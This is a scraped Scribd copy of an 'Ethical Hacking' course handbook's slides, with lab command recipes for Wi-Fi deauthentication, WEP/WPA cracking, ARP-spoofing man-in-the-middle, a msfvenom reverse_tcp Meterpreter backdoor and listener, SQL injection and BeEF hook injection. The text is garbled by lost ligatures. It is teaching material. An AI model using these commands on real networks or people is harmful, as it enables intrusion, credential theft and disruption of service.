Scribd
Upload
18 views60 pages

Ethical+Hackers+Handbook

Uploaded by

mustafa.turk35170
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
18 views60 pages

Ethical+Hackers+Handbook

Uploaded by

mustafa.turk35170
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 60

ATIL SAMANCIOGLU

ETHICAL HACKING
HACKER’S HANDBOOK
COURSE CONTENT

▸ Introduction

▸ What is Ethical Hacking?

▸ What are we going to learn?

▸ Before we start
COURSE CONTENT

▸ Setup

▸ What is Virtual Machine and why?

▸ Setting Up Virtual Box

▸ What is Kali Linux?

▸ Setting Up Windows 10 as VM

▸ Snapshots
COURSE CONTENT

▸ Kali Linux

▸ Kali Linux Overview

▸ Linux Commands

▸ Changing Kali Password


COURSE CONTENT

▸ Be Anonymous On Web

▸ How Networks Work?

▸ VPN & DNS

▸ Changing DNS Servers

▸ Using VPN Books

▸ Practical Usage of VPN


COURSE CONTENT

▸ Dark Web

▸ What is Dark Web?

▸ Tor Browser

▸ Browsing Dark Web


COURSE CONTENT

▸ Network Penetration Testing

▸ What is Network Penetration?

▸ Choosing a wi- card

▸ Setting up wi- card

▸ What is MAC address?

▸ Monitor Mode vs Managed Mode


fi
fi
COURSE CONTENT

▸ Pre-Network Penetration

▸ Packet Snif ng (Airodump-ng)

▸ Targeted Packet Snif ng

▸ Deauth Attacks

▸ Fake Access Points


fi
fi
COURSE CONTENT
▸ Network Penetration Testing

▸ What is WEP and how do we crack it?

▸ WEP Cracking Executions

▸ WEP Cracking Fake Auto

▸ WEP Cracking ARP Request Replay

▸ What is WPA and how do we crack it?

▸ WPA Cracking - Handshakes

▸ WPA Cracking - Wordlist

▸ How to protect yourself?


COURSE CONTENT
▸ Post-Network Penetration

▸ Post Connection Settings

▸ Using netdiscover

▸ Infamous framework: nmap

▸ Man In The Middle

▸ Manual Arp Poisoning

▸ MITM Framework

▸ Using SSLStrip

▸ What is HSTS?

▸ Messing with DNS

▸ Taking screenshot of target

▸ Injecting keylogger to target

▸ Injecting Javascript codes

▸ Wireshark Setup

▸ Wireshark analysis

▸ How to secure yourself from MITM?


COURSE CONTENT
▸ Attacking Computers

▸ Metasploitable 2 VM

▸ How to gather basic information?

▸ Using basic exploits

▸ Code executions

▸ MSFC setup (Metasploit community)

▸ MSFC scan

▸ MSFC analysis
COURSE CONTENT
▸ Attacking on users

▸ What is Veil?

▸ Veil overview

▸ Creating Trojans

▸ Listening incoming sessions

▸ How to deliver trojans

▸ Bdfproxy con guration

▸ Injecting trojans on the downloads


fi
COURSE CONTENT
▸ Attacking on users - Social Engineering

▸ How to use Maltego?

▸ Targeting

▸ Creating an attack strategy

▸ Coupling trojans with different les

▸ Brand new trojan

▸ Trojan pretending to be a .jpg

▸ E-mail forgery
fi
COURSE CONTENT
▸ Attacking on users - Beef

▸ What is Beef?

▸ Hooking with Mitmf

▸ Attacking targets

▸ Stealing Facebook, Youtube passwords

▸ Taking over control

▸ How to protect yourself?


COURSE CONTENT

▸ Setting Up Your Router

▸ Network Settings

▸ Outside Backdoor

▸ Hacking In
COURSE CONTENT

▸ Post Hacking

▸ Meterpreter Sessions

▸ Migration

▸ Downloading Sensitive Files

▸ Capturing The Keylogs

▸ Sustain The Session


COURSE CONTENT
▸ Website Pentesting - Info Gathering

▸ Website Pentesting Setup

▸ Maltego Again!

▸ Netcraft

▸ Reverse IP

▸ Whois Lookup

▸ Robots

▸ Subdomains
COURSE CONTENT

▸ Website Pentesting

▸ Code Execution Vulnerability

▸ Reverse TCP Commands

▸ File Upload Exploit

▸ File Inclusion
COURSE CONTENT

▸ Hacking Websites with XSS

▸ What is XSS?

▸ Re ected XSS

▸ Stored XSS

▸ Real Time Hacking with XSS

▸ How to Protect Yourself?


fl
COURSE CONTENT

▸ Databases & SQL

▸ What is SQL?

▸ Android Studio Example

▸ Writing Values to Database

▸ Retrieving Values From Database

▸ Deleting and Updating Datas


COURSE CONTENT
▸ SQL Injection

▸ Databases in Metasploitable

▸ Mutillidae Database

▸ Testing Vulnerabilities

▸ Post Method SQLi

▸ Retrieving Admin Pass

▸ Stealing Every Password On Database

▸ Learning Database Name

▸ Digging Deeper

▸ Retrieving Everything
COURSE CONTENT

▸ Website Pentesting Tools

▸ Sqlmap

▸ Zap

▸ Zap Analysis
WHAT TO LEARN?
▸ Before hacking into the computer

▸ VPN - Deep Web

▸ Network Pentesting

▸ Hacking into the computer

▸ Attacks on computers

▸ Attacks on users

▸ After hacking into the computer

▸ Meterpreter etc.

▸ Website hacking

▸ Code vulnerabilities

▸ SQL Injection

▸ XSS
VIRTUAL MACHINE
IP - DNS - VPN
REQ
UES
T

192.168.0.10 RESPO
NSE

REQUEST ROUTER REQUEST

RESPONSE RESPONSE INTERNET


192.168.0.11
192.168.0.1
E S T
RE QU 85.100.25.149

N S E
SP O
192.168.0.12 RE
DARK WEB
VISIBLE WEB

DEEP WEB

DARK WEB

TOR FREENET
NETWORK PENETRATION
▸ Pre - Network Connection

▸ Connecting to Network: Wi- hacking

▸ Post - Network Connection


fi
MAC ADDRESS
▸ ifcon g <interface> down

▸ macchanger -m <mac> <interface>

▸ ifcon g <interface> up
fi
fi
MONITOR VS MANAGED
AIRODUMP-NG

▸ airmon-ng start <interface> (monitor mode)

▸ airodump-ng <interface>

▸ control + c
AIRODUMP-NG

▸ airodump-ng —channel <channel> —bssid <bssid> —write


< le_name> <interface>

▸ airodump-ng —channel 12 —bssid 40:30:20:10 —write test


mon0
fi
DEAUTHENTICATION ATTACK

▸ aireplay-ng —deauth <#packets> -a <AP> <interface>

▸ ex: aireplay-ng —deauth 1000 -a 10:20:30:40 mon0

▸ aireplay-ng —deauth <#packets> -a <AP> - c <target>


<interface>

▸ ex: aireplay-ng —deauth 1000 -a 10:20:30:40 - c 00:AA:11:BB


mon 0
ENCRYPTION
▸ WEP

▸ WPA / WPA2
WEP
INIT
IALI
Z ATIO
IV + N VEC
KEY TOR
(PAS (IV)
SWOR
REQ D )
UES INTERNET
T
E S T
RES REQU
PON
SE
NS E
PO
REQUEST ROUTER RES

RESPONSE

E S T
RE QU

N S E
SP O
RE
WEP CRACKING

▸ airodump-ng —channel <channel> —bssid <bssid> —write


< le_name> <interface>

▸ ex: airodump-ng —channel 10 -bssid 10:20:30:40 -write test


mon0

▸ aircrack-ng < le_name>

▸ ex: aircrack-ng test-01.cap


fi
fi
WEP CRACKING - FAKE AUTH

▸ aireplay-ng —fakeauth 0 -a <target_MAC> -h <kali_MAC>


<interface>

▸ ex: aireplay-ng —fakeauth 0 - a 10:20:30:40 -h


50:AA:BB:40 mon0
WEP CRACKING - PACKET INJECTION

▸ aireplay-ng —arpreplay-ng -b <target_MAC> -h


<kali_MAC> <interface>

▸ aireplay-ng —arpreplay-ng - b 10:20:30:40 -h 00:aa:bb:33


mon0
WPA CRACKING

▸ Handshake

▸ Wordlist
WPA/WPA2

▸ airodump-ng —channel <channel> —bssid <bssid> —write


< le_name> <interface>

▸ ex: airodump-ng —channel 10 - bssid 10:20:30:40 -write test mon0

▸ aireplay-ng —deauth <#packets> -a <AP> -c <target> <interface>

▸ ex: aireplay-ng —deauth 1000 - a 10:20:30:40 -c aa:bb:30:40


mon0
fi
CRUNCH

▸ ./ crunch <min> <max> <char> -t <pattern> -o le

▸ ex: ./ crunch 8 10 123!’^+% -t m@@@p - le wordlist

fi
fi
WPA/WPA2 WORDLIST

▸ aircrack-ng <handshake_ le> -w <wordlist>

▸ ex: aircrack-ng test-01.cap -w wordlist


fi
DISCOVER

▸ netdiscover -i <interface> -r <range>

▸ ex: netdiscover -i wlan0 192.168.1.1/24

▸ nmap
PORTS

Port # Protocol Port # Protocol


20/21 FTP 123 NTP
22 SSH 137/138/139 NetBios
23 Telnet 143 IMAP
25 SMTP 161/162 SNMP
53 DNS 179 BGP
67/68 DHCP 389 LDAP
69 TFTP 443 HTTPS
80 HTTP 636 LDAPS
110 POP 989/990 FTP w SSL/TLS
MITM
ROUTER

RE
E S T SP
QU ON
RE SE
S E RE
N QU
RE SPO EST

HACKER
MITM
ROUTER

RE
SP
ON
SE
RE
QU
EST

REQUEST

RESPONSE HACKER
MITM

▸ arpspoof -i <interface> -t <target_IP> <AP_IP>

▸ arpspoof -i <interface> -t <AP_IP> <target_IP>

▸ echo 1 > /proc/sys/net/ipv4/ip_forward


GAIN ACCESS
▸ Attacking to Computers

▸ Attacking to Users
METASPLOIT

▸ msfconsole

▸ show

▸ use

▸ set

▸ exploit
METASPLOIT

▸ download Metasploit Community from web

▸ cd Downloads

▸ ls

▸ chmod +x metasploit-latest-linux-x64-installer.run

▸ https://localhost:3790/
ATTACKING USERS

▸ Working with backdoors, trojans

▸ Most probably will require interaction with user

▸ Social Engineering
ATTACKING USERS

▸ msfvenom --list payloads

▸ windows/meterpreter/reverse_tcp

▸ payload platform / payload type / payload protocol


ATTACKING USERS

▸ platform:

▸ windows

▸ linux

▸ osx

▸ android

▸ apple_ios

▸ python, java, generic …


ATTACKING USERS

▸ type:

▸ shell

▸ meterpreter

▸ dllinject, peinject, vncinject …

▸ exec, messagebox …
ATTACKING USERS

▸ protocol:

▸ reverse vs bind

▸ http, https, tcp, udp

▸ reverse_tcp

▸ bind_http
ATTACKING USERS

▸ msfvenom —payload windows/meterpreter/reverse_tcp —


list options

▸ msfvenom —payload windows/meterpreter/reverse_tcp


LHOST=10.0.2.15 LPORT=8080 —format exe —out my
backdoor.exe
ATTACKING USERS

▸ msfconsole

▸ use exploit/multi/handler

▸ show options

▸ show payloads

▸ set PAYLOAD windows/meterpreter/reverse_tcp

▸ set LHOST 10.0.2.15

▸ set LPORT 8080

▸ exploit -j -z
METERPRETER

▸ background

▸ sessions -l

▸ migrate

▸ sessions -i

▸ sysinfo

▸ ipcon g
fi
DATABASE & SQL
SQL

▸ select * from accounts

▸ select * from accounts where username = ‘james’ and


password = ‘654321’

▸ select * from accounts where username = ‘admin’ #


BEEF INJECTION MITMF

▸ python mitmf.py —arp —spoof —gateway 10.0.2.1 —target


10.0.2.4 -i eth0 —inject —js-url http://10.0.2.8:3000/hook.js

You might also like